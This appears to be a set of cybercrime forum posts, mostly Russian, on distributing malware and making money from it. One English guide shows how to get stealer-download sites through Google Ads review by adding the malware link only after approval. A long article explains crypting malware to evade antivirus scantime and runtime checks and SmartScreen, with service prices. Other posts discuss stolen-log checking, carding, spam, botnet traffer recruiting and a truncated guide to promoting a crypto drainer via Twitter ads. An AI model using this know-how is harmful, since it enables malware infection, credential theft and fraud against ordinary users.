83. Megapush — Рекламная пуш сеть, с глобальным сообществом вебов в
телеграме, открытыми объемами трафика, открытыми названиями фидов, простой
настройкой
рекламных кампаний, аукционом для ставок под каждое ГЕО.
84. Push Compass — Рекламная сеть пуш уведомлений и popunder баннеров, с трафиком из Азии, США и Европы. Есть русскоязычный сапорт.
85. Push Guru — Нет это не сетка от создателей Guru Conf) Ребята молодые и
малоизвестные среди арбитражников. И тем не менее, нас заинтересовали низкие
ставки за клик,
минимальное пополнение в 25$ и наличие кешбека. Есть, кто работает с этой
сеткой? Поделитесь отзывами в коментах!
86. Push House — Рекламная сеть пуш уведомлений с человеческим сапортом,
большими объемами трафика и новым
функционалом.
87. TrendingBid — Пуш сетка предлагает живую статистику и в дополнение к пушам, clickunder трафик.
88. Yamads — Рекламная сеть пуш уведомлений, с гибким таргетингом по ГЕО, профессии, операционке и типу трафика.
89. Zeropark — Рекламная сеть пуш уведомлений, pop и директов, с калькулятором поддержкой нескольких крео в одном пуше.
Видео рекламные сети. Каталог сетей, которые продают видео рекламу.
90. Adsence Video, On Air — Не могли не добавить рекламную сеть от Гугл с видео форматом рекламы Есть поддержка линейных видеороликов, trueview, overlay и fullshot.
91. Select Media — Медиа платформа с видео рекламой под азиатский трафик.
92. Spotx — Зарубежная видео рекламная сеть с поддержкойSDK, VAST, VPAID и
JavaScript тегов.
.
93. Spring Serve — Зарубежная видео рекламная сеть, для размещения рекламы на
мульти платформенных устройствах94. Video Intelligence — Медиа рекламная сеть
для премиум видео трафика.
Купить трафик в поисковике. Замена Google и Yandex. Альтернатива поисковикам.
95. Bing — Вторая по популярности поисковая сеть в мире, благодаря
навязанному поисковику от Microsoft.
Открывается с рекламой при любом обновлении, ужасно назойлива и тем не
менее, поисковик Bing пользуется
популярностью. Хорошая альтернатива Гуглу, с меньшими ставками за клик.
96. DuckDuckGo — Самый лайтовый поисковик, Не спамит рекламой, но все- таки ее продает. Подключается реклама через тот же Bing Ads.
97. Kenshoo — Рекламная сеть оказывает услуги e-commerce бизнесу для продвижения в топовых поисковиках Азии, США, Европы.
98. Shenma — Мобильный поисковик в Китае с платформой для покупки рекламы. Если вы уже работали с рекламными сетками Азии, присмотритесь и к мобильному трафику.
99. Swisscows — Интересный поисковик из Швейцарии, который к сожалению не
заточен под рекламу, и не собирает
данные пользователя. Нам он приглянулся одной фичей: сбор семантической
карты сайта, рекомендуем затестить.
100. Yippy — Еще один поисковик без рекламы, но с
разделением на кластеры, своего рода дерево тем поисковой
тематики.
Что же лучше подойдет для новичка - FB & UAC?
С чего начинали вы и с какими проблемами вы столкнулись на момент обучения
Сколько времени вы потратили для того чтобы выйти на заработок в 1к$ в месяц
Да я понимаю что профита в гугле куда больше будет, но по поводу гугла я думаю
что инфы мало есть как правильно лить, а если покупать курсы то явно воду
нальют в уши
Так как по гуглу мало годных курсов
А по поводу фб - есть много инфы как лить на разные вертикали и можно легко
изучить базу
Вопрос - я нашёл чела который занимается арбитражем, стоит ли покупать курс
200-400$ где дают связку, пожизненную поддержку, обучают и тд.
Человек открытый и не вызывает какого либо подозрения
Просто прикол в том что если начинать самому, понимая базу
То не факт что ты сразу же выйдешь на ебанутый доход, ведь нужно искать оффер,
связку и метод как заливать первобилом
Тоже самое и про бюджет
Заранее спасибо всем за ответ
Только начал изучать спам по почтам, поэтому прошу помощи у знающих людей кто сможет подсказать акутальный бесплатный SMTP Checker
Всем привет, раньше лил трафик на стиллер в ют, затем в тт в команде
Сейчас первое закрутило гайки, а второе мусор с закрученными гайками
Прочитал множество статей на форуме по поводу логов, начиная с ФБ, заканчивая
CRM системами и все таки осталось пару вопросов:
1- Остались ли бесплатные источники трафика? (пусть трафик будет на уровне
ютуба)
2- Актуально ли сейчас лить на exe файл?
3- Можно ли самому менять расширение стиллера при условии его
работоспособности?
Буду благодарен за ответы
Помогите пожалуйста
Как чекнуть крипто логи с помощью Paranoid'а?
Есть - 550 логов и 550 прокси типа IPv4 192.168.52.52:5252
логи выглядят так -
Папки могу отличаться
Напишите пожалуйста подробно, что и куда нажать. Новичок
Привет всем, хотелось бы узнать у людей которые отливали карж ФБ препеем, с какими проблемами вы столкнулись при использовании каржа?
can someone tell me an effective way to spread a link over email? it seems i try gg short url and it just doesnt work? am i missing something? trying to spread my lnk direct download link.
thanks
Ask me about anything related to bring traffic from spam i will do my best to answer all your questions
Только начинаю во всем разбираться,но интересна больше всего тема с логами, если кто-то хочет взять в ученики или помочь разобраться где,через что и как их получить,буду благодарен
Всех приветствую! Решил по белому заняться тг каналом.может есть какие методы нагнать ЦА бесплатно или условно бесплатно. Спасибо
Есть ли дорожная карта по обучению спама? С чего начинать? Интересует спам только на корпоративные почты, если кто то предоставит годную, действительную информацию по обучению - в долгу не останусь.
UserName MrDe3d
I am writing this article for xss.is and there users
Today I will teach you all about Traffic (you can use this method to get unique install
you can also use this same method for sales or leads if you are selling something)
what we will cover in this blog
I will try to cover this topic in few lines because mostly people know about this topic
= you can find alot of cheap sellers which selling domains and hosting in some 2 usdt or 1 usdt like (orange host) in starting you can use this but i will not recommended to purchase from them one of the reason is they are selling shared hosting so you =r hosting or domain will be banded any time
= I will recommended to purchase bullet proof domain and hosting you can find alot of opetions to get i will mention some provider (anonrdp.com) i have used there domains and hosting and they also providing ddos protection
= Third option in xss forum just search domian you also get sellers from here you can purchase from them
= also purchase hosting from them or you can use any option and just write in support to connect your domain and hosting together and in few hours your domain will be live
= open your cpanel (dont worry you will receive email with the access of cpanel when you purchase hosting no need to pay extra)
you will get details of username and password and url to access the cpane
use username and password to access
after success full login
Now Come To WordPress Manager Scroll Down You will get in Software Tabs
Click On Them
Now Click On Install
Now Click On Quick Install
= it will take few minutes and setup wordpress for you
During installion it will ask you for email and password remember this password or save in .txt file you will needed every time when you login
alwaye make sure to use firendly theme easy to read
you can use jannah theme
you can use astra theme
you can use Colormag theme
you can use benqu theme
you can use binduz theme
you can use wavy theme
you can use katen theme
for my self i am using katen theme
just copy the name and search on google you can find all of them free of cost
Login in your admin panel
at left side you will see Appearance
and go to Add New Theme
From here you can Upload theme
Come to post section you will see opetions of Categories
Click On theme and Create Categories
like 1 games
2 Vpns
3 Antiviruses etc
Dont bind your malware or add any link right now as i tell we have to run google ads so we have to follow all the rules
after the conformation of ads then you able to add link of your malware etc
give a attractive title you can use chatgpt
SOME TIPS FOR SEO
use rank math seo plugin for the seo they help you alot
use chatgpt seo in rank math seo plugin you can see the score of words which you are going to use for seo
in chat gpt ask them “ generate an attractive and user read friendly article on topic freedom fighter 6 game use ”freedom fighter “ games” word as a keyword"
same word you have to use in title
in the starting of paragraphs
also write this word in seo plugin you will see your seo results
please dont add any download able link etc wait more
lets swict to ads most important topic
There are two types of google ads account 1 was an normal 2 google agency account in google agency account you not need to wait any conformation you can promote directly black hat stuff on next belog we can talk about google agency account
what can you do by learning google ads if you are marketing expert then you know the importance of google ads
if you are seller you can use google ads to get leads
if you have your shopify store then you can use google ads
you can sell traffic to others belongs to blogging or may be traffic for stealers
you can teach others google ads by talking money from them
open google search google ads
click on the 1 link you will redirect to ads account
no special setting here just sign up with your gmail
Then verify your payment (link your card make sure they will cut temperory 10 usdt in few seconds they will return in your account then)
at the left side click on create then select Campaign
select website traffic and click on continue
Then you Will See Campaign type
1 search
2 max performance
3 display
4 shopping
5 video
6 demand gen
we will use display ads due to cheap
if you choose max performance then your ads will be show on all places but expensive
choose display give website url and continue
then you will get campaign name option give any name may be your domain name not much important
then you will see location option mostly clients need us so just choose us then your ads only show in us
IN language you can choose any language
click on next
in biding section choose conversions
you can select your budget 10 us dollars etc
click next
Now Its Important Section
in business name section give any name
add your website logo you can create logo from canva
upload minimum 5 images
Headline you have to add minimum 8 headlines for better results
you can use chatgpt to ask theme to generate headline for you check the words limit
then same long headline
ask gpt to generate for you headline on based of most ranked keywords and must be uniuqe headline
have to add minimum 8 google recommandation was 5 but i recommended you to add minimum 8
then click next
then review your ads to make sure your daily budget was set if needed you can add end day
then click to submit
with in few hours your ads will be live
and with in day or in 24 hours you start getting results
when you start getting results then you able to upload download link or may be create an sub domain of website add download button when user click on download button it will redirect to subdomain there you can give them download link
all policies are followed
my recent ads results cost 12 usdt dollors
Rest ADS would be cover on next blogs
Нужны трафферы на Ботнет (HOOK)
Ищу на долгое сотрудничество
Деньги на расходы не даю!
Источник трафика любой
Хочу научиться проливать трафик с Gads, Bing, Fb, спам и так далее. на разные
проекты от гемблы до вирусов и фишов (что угодно но не крипта)
Знания у меня имеются, не дуб и не тупой, раньше лил с фб,
Кого ищу ?
ищу хороших ребят хоть с какими то средствами для теста связок (ничего не
продаю), если у вас есть опыт (не важно какой), идеи или что то другое то
велком, планирую совместную работу в тиме, если надо будет могу сделать
депозит гаранту чтобы вы не волновались на счет удара в спину.
Кто хочет также двигаться в теме трафа и сделать для себя хороший нетворкинг, просьба написать в ЛС свой телеграм.
Кидалы и наркоманы не отнимайте время, я ничего не продаю и не покупаю, хочу найти людей чтобы с ними тестить связки по трафу и делиться опытом, закрывать минусы друг-друга и достичь чего либо.
**Приветсвую!
Держите мануал в работу.
Сливаю тему, по которой сам работаю.
rabote-s-Google-ADS--MCC-11-23-2)
Решил написать краткий мануал как лить с МЦЦ в гугл адс не боясь банов. Мцц - это менеджер акков гугла, с помощью которого мы создаем множество аккаунтов, привязанных к одному менеджеру, которые между собой вообще не связаны! То есть, если один отлетает в бан - остальные льются дальше. Способ...
telegra.ph
**
каждого, кто работает с логами, трафиком и инсталлами – крипт файла**
Что вы узнаете из данной статьи:
Если данную статью читают совсем новички, то придется объяснять с азов. Грубо говоря, файл криптуют, чтобы для антивирусов этот файл выглядел белым и пушистым. То есть его можно скачать и запустить, без каких-либо последствий со стороны этого самого АВ.
В общем-то, на этом задача крипта заканчивается. Но народные легенды постепенно начали приписывать, ему (крипту то бишь) совершенно волшебные свойства, и теперь в 2023 году, «грамотный крипт» разве что не лечит лейкемию 4 стадии.
Что такое крипт разобрались. Верно? Теперь разложим по полочкам следующий вопрос, о котором мало кто понимает в общем и целом, и над некоторыми аспектами в частности. Итак, рассмотрим все системы защиты от и до по порядку. По каждому из пунктов пройдемся дополнительно в дальнейшем.
1) Прогруз файла в браузере – обозначает «способность» файла проходить проверку браузера и не выдавать разного рода алерты (файл опасный, файл потенциально опасный, файл редко скачивается, файл заблокирован и т.д.). Прогруз должен работать просто – файл скачался и готов к открытию. Всё! Без иных вариантов.
2) Статичная проверка антивируса или ScanTime – АВ проводит проверку прямо внутри браузера при скачивании файла. За успешное прохождение отвечает хороший крипт. Эта опция иногда может быть отключена, у некоторых антивирусов, таким образом, скантайм проверка выполняться не будет.
То есть подведем промежуточный итог – для того чтобы файл скачался без проблем и без алертов, должны быть пройдены 2 системы защиты – браузера и антивируса.
3) UAC – иногда сервисы любят понтануться, что у них реализован обход User Account Control. С запросом на открытие файла при скачивании из браузера ничего общего не имеет. В общем-то, вам лишний алерт ни к чему, поэтому стоит озадачиться обходом, благо это несложно.
4) Динамическая проверка АВ при запуске или так называемый RunTime – при запуске файла АВ начинается активно его проверять по своим алгоритмам. За прохождение отвечает крипт, который должен выдержать эту проверку. Если что-то не понравилось – болт. О разнице между скантаймом и рантаймом поговорим чуть попозже. А о рантайме, где всё до крайности непросто, уделим отдельный блок статьи.
5) Смартскрин – еще одна система проактивный защиты, не связанная с антивирусом. Проверяет подпись файла и его сертификацию. Если что-то не нравится, начинает задавать вопросы на тему: «Уверены, что хотите запустить файл?». Логика работы вне человеческой сферы понимания. Рассмотрим отдельно, ибо информации насчет смартскрина вы нигде больше не найдете.
То есть подведем окончательный итог – для того чтобы файл запустился без проблем должны быть пройдены еще 2 системы защиты – динамической проверки антивируса и смартскрина. Если ваш билд рабочий (а многие крипты убивают работоспособность билда, кстати) – получите долгожданный отстук в панель.
Если у вас варит мозг или уже есть опыт, то вы должны сходу подумать о том, что криптованный файл надо где-то проверять на работоспособность и способность обходить системы защиты, в частности антивирусов. И если проверять файл на тот же прогруз - это быстро и просто, то вот проверить файл на обход защиты антивирусов, коих десятка 3-4 наберется, уже задача, мягко говоря, проблемная.
Именно поэтому были придуманы разного рода чекеры на вирусы – от общеизвестного ВирусТотала (ВТ), который сливает всё врагам (логично - это его работа), до якобы теневых чекеров, которые ничего не сливают (авчек, сканмайбин и динчек).
Логика работа простая – вы загружаете файл, отмечаете галочками АВ, которые вас интересует. Жмякаете кнопочку и дожидаетесь результатов проверки. У сервиса динчека (единственного) есть так же возможность проверки на рантайм – можно настроить параметры и проверить, как поведет себя ваш файл при запуске.
Важнейшее замечание #1 – 90% сервисов рантаймом не занимаются. Почему? Об этом в дальнейшем.
Click to expand...
Важнейшее замечание #2 – вы удивитесь, но большинство хомячков даже не знает о таком параметре как рантайм. Во-первых, потому что смотри пункт 1. Во-вторых, потому что проверить его можно автоматически только на динчеке, а это достаточно дорого (3.5 бакса разово или подписка от 50 долларов в неделю).
Click to expand...
Важнейшее замечание #3 – подтвердить не могу, но кажись авчек сливает инфу «налево». Слишком быстро дохли файлы. За динчеком такого не замечено.
Click to expand...
Внимание! ВСЕ чекеры на АВ – это глобальный развод и афера века
Товарищ, прежде чем ты побежал, высунув язык, проверять свой крипт на том же динчеке, прочитай эту статью, особенно текущий параграф и твой мир перевернётся.
Итак, я не буду ходить вокруг да около. Если ты уже успел посетить форумы, специализирующих на определенных услугах а-ля крипт файла, то ты мог заметить, что везде мерилом успеха является нулевые детекты на скантайм через динчек (обычно используют его все). Кто-то называется это FUD=0, кто-то по другому, но суть простая – файл проверяется где-то и с важным видом вам показывают ссылку типа «вот, по нулям, получи и распишись».
Создатели софта обычно показывают статистику по рантайму а-ля: «У нас всего N детектов, всё круто и классно».
А вся мякотка в том, что данные, которые показывают чекеры НЕВЕРНЫЕ!
Важнейшее замечание #4 – Я не знаю, почему так, врать не буду. Ибо не изучал, как устроены чекеры и на каких алгоритмах работают. По крайней мере если есть детекты, то тут чекеры правдивы с вероятностью 80-90% Но в ином случае они критически расходятся с тем, что есть в реальности.
Click to expand...
Всё началось в своё время с того, что антивирусы на машинах, детектили файл там, где его детектить нельзя было по умолчанию, ибо все чекеры показывали, что файл чистый.
«Что за хрень?» - подумал я, и мы решили углубиться в этот вопрос глубже
Вывод для scantime и Runtime - расхождение составило до 80% при живой проверке
Еще раз. В восьми случаях из 10 там, где чекеры показывали, что всё чисто, в реальности наблюдался детект! Особенно на топовых антивирусах типа аваста, нода, есета и прочих.
Так как я уже прямо ощущаю, что у читающих начинает гореть пукан и руки, готовы набирать гневные сообщения про «их личный отстук в 90%», я сразу внесу определенные корректировки.
_Сделал я, господа, криптик-с своего файла. Прогружается, голубчик, всё с ним славно и благостно. Решил я со своей родной машинки его скачать. Ну а что? Дюже лишняя проверка не помешает. Да и стоит у меня на моей родной машинке AVAST, собака такая, ни одну гадость не пропускает. И тут, господа, качаю я файлик, а он, зараза такая, детектится! Ну, я не лыком шитый, опять быстренько делаю проверку на скантайм – всё чисто, мать его итить!
От собака! Взял я парочку дедиков на десяточке, поставил туда AVAST, убил, господа, пол-дня. Качаю – детекты! Детекты, итить мать его за ногу! А чекер показывает, что всё чисто!_
Я это к чему, если вы лично проверяете файл на живой машине с определённым АВ, или даже на нескольких машинах с тем же самым АВ, и вам усиленно лезет табличка о наличии дряни в файле – то ваши выводы? Кто прав – чекер или ваши личные наблюдения? Вопрос оставлю открытым.
До сих пор не согласны со мной? Тогда читайте дальше, я рассмотрю этот вопрос дополнительно в разделе «Как тогда работают все, при таких детектах?»
Итак, если я вам пошатнул картину мира, и вы решили сами проверить мои слова на истину. То ваш следующий шаг простой – вам нужно сделать/купить минимум 10 машин (топ 10 антивирусов вполне обеспечить охват в 90%) и криптованный билд лично проверять на детекты. Да, ручками. Да, вот таким вот геморройным образом. Но только так вы сможете убедиться в качестве работы, которую вам сделали!
Аналогично, проверяйте и рантайм. И вы сможете увидеть реальную картину мира, а затем подсчитать приблизительные потери при отстуке файла.
И наконец – никто не мешает использовать чекеры для косвенной оценки «уровня жизни крипта». А если после прогруза в динчеке начали появляться детекты, то с вероятностью 80-90% это так и есть.
Важнейшее замечание #5 – Почему крипторы тогда игнорируют столько явные расхождения данных? Моё мнение, что проверка подобным образом 1) слишком муторная; 2) её невозможно доказать клиенту. Ибо бывает и обратная ситуация, когда чистый на живых машинах файл, почему-то усиленно показывается на динчеке как зараженный. Клиенту этого не доказать, да и кому это нужно?
Click to expand...
Важнейшее замечание #6 – С технической точки зрения сделать чистый скантайм, основываясь на показателях ЖИВЫХ машин ничуть не сложнее, чем сделать чистый скантайм под динчек. Но в данном случае непонимание клиентов, приводит к тому, что крипторам проще скармливать ложные данные о детектах. И все довольны.
Click to expand...
В данном блоке я сразу отвечаю на 2 конкретных вопроса:
Итак. Давайте очень упростим для скорости, иначе тут можно смело книгу садиться писать.
Чтобы сделать крипт, прежде всего, нужен некий «криптографический модуль». Который покупается, либо делается с нуля. Дальше на основе этого модуля создаётся стаб (упрощаю объяснение как могу без лишней теории). Ну а дальше можно сажать любую обезьяну, которая будет нажимать на кнопку, и получать готовый файл.
Поэтому если вы встречаете саппорта, который вообще ни в зуб ногой в теме и
орёт матами, какие все тупые – то обезьянЪ детектед. Человека просто посадили
нажимать кнопку и на этом всё. Больше вам он ничем не поможет.
Важнейшее замечание #7 – Конечно, полученный стаб будет постепенно выходить из строя и его придется чистить, апгрейдить и подгонять под изменяющуюся среду. Что уже не самая простая задача.
Click to expand...
А теперь внимание!
Всё вышеперечисленное справедливо ТОЛЬКО для скантайма. Ибо модулей, которые бы позволили автоматически криптовать файлы под рантайм не существует ввиду разницы в … назовём это так … технологической природе процесса. И выходит, что чистить рантайм - это строго ручная и кропотливая работа.
Важнейшее замечание #8 – Ввиду трудозатратности и средней цены за крипт на рынке (20-50 баксов), сервисам заниматься чисткой рантайма никакого смысла нету. Логичный вопрос на тему: «На кой хер нужен чистый скантайм, если там по рантайму 100500 детектов?» перенесем в следующую тему.
Click to expand...
Повторимся. Рантайм – это когда вы запускаете файл, антивирус сканирует его и убеждается, что опасности процесс не представляет. А файл между тем делает свои темные делишки. Уже исходя из этого, можно убедиться, что процесс чистки рантайна намного сложнее, чем сделать чистый скантайм. И чистка рантайма никакого отношения к крипту НЕ ИМЕЕТ.
Рантайм не использует алгоритмы того самого модуля, который используется для крипта на скантайм. Опять же – чистота рантайма большей частью зависит от чистоты билда, которым занимается создатель вашего софта. Рантайм бывает двух типов – static detect и dynamic detect.
Крипт на скантайм и рантайм – это совершенно две разные операции, лежащие в совершенно разных областях! И они никак не пересекаются между собой
Условно крипт на рантайм делается так:
Как вы понимаете, у любого АВ нету магической кнопки «декомпилировать файл и залезть в кишки», иначе любые ухищрения были бы бесполезны.
Поэтому при запуске файла проводится, грубо говоря, «первичная обработка» данных по установленным у АВ алгоритмам. Задача криптора выявить их и обойти. Далее файл, скорее всего, отправится на углублённое обследование в конторку. А потом ваш крипт сдохнет и всё придется начинать с начала. В это окошко как раз и надо работать. У уникального качественного крипта оно может растянуться на долгие дни.
Важнейшее замечание #9 – Именно поэтому критически острой проблемой становится чистота базового билда софта. Ибо вычистить файл при наличии исходников в миллион раз легче, чем чистить уже готовый билд и убирать детекты на рантайм
Click to expand...
Важнейшее замечание #10 - Несмотря на это – вполне реально убрать 3-5 детектов на рантайм. Зависит от того какой АВ палится. При относительно чистом билде и рукастом крипторе можно довести реальный рантайм-показатель до 1-3
Click to expand...
Спрашивали? Отвечаем!**
Обидеть никого не хочу, пост несет нейтральный оттенок. У одних бизнес, у других информация об этом бизнесе
Итак, исходя из вышеуказанного, берем 3 пункта:
Важнейшее замечание #11 - Опять же, есть вполне себе адекватные сервисы, которые делают крипт под скантайм таким же методом, как я описал. Берут машины, ставят туда АВ и чекают ручками – детектится или нет. К сожалению, в паблик такие сервисы выходят редко, ввиду проблем указанных мною ранее. Никому не хочется объяснять тупым обезьянам, почему чекерам верить не стоит.
Click to expand...
Как определить сервисы/специалистов, с которыми работать не надо?
работают? Некоторые так даже вполне себе успешно.**
Это хороший вопрос и я считаю, обязательно нужно разобрать его!
Прежде всего, определимся с критическим нюансом. Вы получаете инсталлы со своего трафика или покупаете их?
Важнейшее замечание #12 - Посмотрите снимок с экрана рабочего стола ваших инсталлов. Вы увидите, что большая часть машин либо вообще ничем не защищена, либо имеют АВ неясного происхождения. Вы крайне редко увидите логи с таким АВ как есет, авира, коммодо, аваст и т.д.
Click to expand...
Важнейшее замечание #13 – В ходе работы, если вы искренне считаете ваш крипт хороший, то вы, скорее всего, уже попали в систематическую ошибку выжившего. Погуглите, вникните. Возможно, это поможет посмотреть на «картину мира» под другим углом.
Click to expand...
Как я уже писал, нынешний крипт с точки зрения школоты и прочей шудры, разве что не лечит от онкологии последней стадии. А еще даёт просветление и генерирует биткоины каждый день. Крипторы охреневают от подобных предъяв, и паблик рынок лишается последних адекватных профессионалов
Прежде всего «уник стаб» подразумевается тем, что он сделан индивидуально под необходимое вам ПО. Для тех, кто еще не понял: модуль – стаб – крипт. Таким образом, если предположить что криптор «создал» уник стаб под конкретного клиента, исходя из показателей «живых машин» и свёл его в FUD=0 по скантайму. То вы можете взять билд, запихать его в архив под паролем, подержать недельку на облаке, потом достать, чекнуть и там по прежнему будет FUD=0
Важнейшее замечание #14 – Не забывайте, что чек на живых АВ убивает крипт. Данный метод используется ТОЛЬКО для проверки качества криптосервиса, а не для постоянной проверки криптованного билда.
Click to expand...
В свою очередь паблик «стаб» сделан по принципу – один для всех. И срок жизни такого крипта крайне ограничен. Поэтому его обычно делают сразу перед проливом и надеются, что он не сдохнет через 5 минут.
Важнейшее замечание #15 – Это вполне адекватный вариант для тех, кто покупает инсталлы и уверен в скорости пролива. Срок жизни паблик стаба – рандомный.
Click to expand...
Ну и надо понимать, что у качественного уник-стаб под ваше ПО обычно ценник идет за аренду в месяц под безлимитный крипт файла. Ибо никому неинтересно, сколько вы там собираетесь раз его использовать. Цена от 1К и выше.
То, с чего начинается путь земной вашего файла. В идеале, должен быть без алертов а ля - файл опасный, файл потенциально опасный, файл редко скачивается, файл заблокирован. В ином случае, можете забыть про 99% отстука.
Прежде всего, надо понять две базовые вещи:
Важнейшее замечание #16 – Еще раз. Вначале, при загрузке файла, идет проверка файла браузером (особенно, когда файл грузится и мигает, крутится значок загрузки). Затем, после скачивания, начинается проверка файла антивирусом (если этот модуль активен).
Click to expand...
Подготовить файл для прогруза в браузере задача сложная и многофакторная. И пути её решения, конечно же, никто палить не будет
Бонусом гугл тоже на месте не стоит и постоянно вводит новые условия. В общем и целом, для разрешения задачи нужно по минимуму иметь:
То есть, как вы заметили, крипт файла и подготовка уже криптованного файла для прогруза в браузере – задачи совершенно разные. Адекватный криптор с прямым руками может помочь в этой проблеме, но обычно не хочет. Почему? Спасибо школоте, которая начала это требовать чуть ли не с претензиями и истериками.
Важнейшее замечание #17 – крипт есть крипт. Прогруз есть прогруз. Не мешайте всё в кучу. Каждая задача требует отдельного решения.
Click to expand...
Последний рубеж обороны windows. Головная боль логоводов. И сомнительной полезности вещь для рядового пользователя.
В чем ее теоретическая суть?
Судя по всему, система должна была проверять сертификацию файлов и брать на карандаш файлы без доверенного сертификата.
Что по факту?
По факту смартскрин работает как наркоман под смесью DMT, LSD и мухоморов. Блокирует хорошие файлы, пропускает плохие. Не обращает внимание на недоверенные файлы и ругается на файлы с валидной подписью. Причем совершенно рандомно.
В чем проблема?
В среднем около 30% машин имеют табличку от смартскрина «хотите установить файл? Подпись не удалось проверить». Конверт это нормально так режет…
Как обойти?
Увы и ах, гарантированных методов обхода не существует. Обычный валидный сертификат, проблему не решает полностью. Как показала практика, использование валидного сертификата, кои продаются за 200-300 баксов, снижают появление окошка примерно в 1.5-2 раза. Стоит ли оно тех денег? Тут каждый решает сам.
Важнейшее замечание #18 – Бывают ситуации, когда смартскрин не пропускает файл, который имеет валидную лицензию или цифровую подпись, купленную официально за кровные деньги. Это связано с тем, что загрузок этого файла слишком мало. Накрутка не поможет, можете не стараться. Официально считается, что помогает лицензия разработчика расширенного образца. А так же бывают ситуации, когда файл без сертификата и подписи открывается без вопросов. Некоторые АВ, при открытии файла действуют именно по этой схеме, даже если он кристально чистый.
Click to expand...
Как решить вопрос?
Опять же, либо только смириться, либо использовать валидный сертификат. Можно попробовать купить самому – это существенно сэкономит средства. У комодо он стоит всего лишь 80-90 долларов. Дерзайте.
Политика ценообразования
Я всего лишь приведу собственные мысли на этот счет, исходя опять же из личного опыта. Может кому-то это поможет.
Цена за паблик-крипт (скантайм): 10-70$ В принципе цена зависит от используемого алгоритма и чистоты скантайма. Покупая крипт за 10 долларов, вы получаете соответствующее качество. Дороже крипт – лучше качество. Как показывает практика, крипторы, которые еще делают нормальный и адекватный паблик-крипт остались.
Вообще есть золотое правильно - крипт за 10-15 баксов, это не крипт, а бесполезная имитация
Так же уточняйте, у многих в цену крипта (которые стоят по 30-50$) в услугу может входить помощь с прогрузом. По крайне мере раньше входила, пока гугл с концами не пережал все гайки.
Цена за уник-крипт (скантайм+рантайм): тут надо понимать 2 варианта ситуации. Прежде всего криптор, который может сделать уник стаб, так же может почистить и рантайм. Но это не относится к крипту! Еще раз: рантайм никакого отношения к крипту НЕ ИМЕЕТ! И услуга скорее всего должна будет оказываться совместно. Обычно разовый крипт под уник стаб стоит около 100$-150$ + очистка рантайма. Месячная аренда уник стаба под себя стоит 1-2К.
Важнейшее замечание #19 – цена на уник стаб исходит из трудозатрат. Как вы думаете, кто вам будет покупать весьма нехило такой дорогой модуль, потом создавать стаб, отлаживать, чистить его и всё ради того, чтобы продавать вам крипт за 40-50$? Идиотов нет. Если вы думаете, что есть, то скорее всего, идиот тут вы.
Click to expand...
Важнейшее замечание #20 – если вам предлагает уник-стаб за слишком дешевые деньги, то это обычный развод. Не попадайтесь на удочку мошенников. Крипт либо дешевый и простой. Либо дорогой и сложный. Серединки тут практически нет.
Click to expand...
Цена за помощь с прогрузом: По нынешним меркам 20-50$ с учетом того, что подготовить файл дело не самое быстрое, в принципе адекватная цена. Другое дело, что задача это нудная в том плане, что своих денег не стоит. С третьей стороны – договориться всегда можно. Лишняя монетка никому не помешает.
Что делать по итогу?
Исправляюсь и предлагаю аж 2 варианта на выбор:
Важнейшее замечание #21 – копание в говне обычно всегда даёт результаты! Не сдавайтесь. Адекватные крипторы есть, их надо просто найти.
Click to expand...
Важнейшее замечание #22 – к этому времени нужно иметь хоть какую-то базу. Если вы сами нихера не знаете, не умеете и не имеете, то и к вам будет липнуть точно такая же шелупонь. А оно вам надо?
Click to expand...
копипаст , на форуме не нашёл
Не забывайте! всегда интересно ваше мнение
Наш чат Картель ADS https://t.me/+y0MbOBjF1OVmMTJl
Всем привет..
Многие из здесь присутствующих прямо или косвенно связанны с траффиком.
Подскажите кому не сложно как защититься от этой
хреномани.
Льем с разных источников не суть... С выдачей файла все ок по стандарту серт +
белый софт дропает с впс на чистом домене и тд.
Отпишу по связке именно путь кнопка скачать и до самого файла, примерно картина такая:
Короткая ссылка => Домены привязанные в кейтаро(.com старые без блэков и тд) => если бот то идет подальше\если человек идет на прямую ссылку на файлообменник(Не бесплатный проплаченный там все ок) на сам архив с с файлами.. С криптом там все ок Серт + белый софт + дроп с другой впс (тоже на .com) доменах при скачивании файла все ок.. Единственное отлетает оч быстро вот эта прокладка между короткой ссылкой и фо
Клауд не помогает вообще ни разу боты отсеиваются в кейтаро но через пару часов прилетает такая хрень.
Уже переносил всю инфру, все ипы на впсках чистые и тд и тп.
Подскажите братцы как можно спасти прокладки эти? Траф НЕ СПАМ!!! Я понял если бы еще, это был спам, там да такое возможно и оч быстро... Но тут Сео + немного других источников и вот как это победить я хз..
Поделитесь мнением кто что думает?
GM bad boy
В сегодняшней программе мы изучим запуск твиттер адс на драйнер.
Однако прискорбную ситуацию мы с вами лицезреем сейчас на рынке, мамонтов всё меньше и меньше гайки закручивают и закручивают с каждым днём всё крепче, вменяемых источников крипто-трафика — посчитать на пальцах По сравнению с тем, что было год/полтора назад — сейчас просто АД И я не шучу, порог входа в вертикаль крипто дрейнеров действительно вырос в несколько раз Один только гугл высосет все ваши деньги на тесты связок, но так и отправит гулять ни с чем, по крайней мере 97% из вас.
Но, сегодня я покажу вам реально АКТУАЛЬНЫЙ, а главное ДАЮЩИЙ ПРОФИТ метод продвижения дрейнеров — твиттер адс, который требует не так много денежных вложений и времени для старта.
LET'S GO
1. Получаем аккаунт Twitter Blue
С тех пор, как птичья площадка попала в лапы Илона Маска, началась чреда не
лучших перемен, одна из них — запускать рекламу в адс могут исключительно
пользователи с подпиской Twitter Blue, по этому синяя галочка на аккаунте —
обязательный атрибут.
Рассматривая метод получения галок мы имеем два пути: дешёвый и подороже, в
первом — собственноручное создание и прогрев аккаунта, длительность
процедуры в среднем 7 дней, если вы работаете в соло, и не имеете напарника
для делегации обязанностей ежедневного создания таких аккаунтов пачками, то ни
о каких объёмах на залив и вразумительном профите не может идти и речи
(банально не будете успевать клепать галки) , а в другом варианте развития
событий — покупка уже готовых акков, вам придётся столкнутся с обнаглевшими
горе-селлерами, которые гнут цену за обычную галку аж до 80$, хотя
приемлемая цена обычных NFT галок без подписчиков — 35-45. Исходя из этого,
для успешного отлива на потоке ищем надёжного поставщика галок по приемлемой
цене (крайне НЕ рекомендую селлеров с зеленки) , можете заглянуть в моего
бота t.me/PreiShopBot (и реклама, и объективная
рекомендация на правах автора) но постоянное наличие аккаунтов не гарантирую,
т.к я выгружаю туда исключительно собственный материал, который сам не успеваю
отработать. Цены самые демократичные, а качество — наивысшие, ибо в первую
очередь я использую данный мат для личных целей, а не продажи. Это касается не
только Twitter Blue, но и гугл фармов.
2. Прогрев после покупки
После того, как вы надыбали аккаунт, наступает КЛЮЧЕВОЙ ФАКТОР успешного
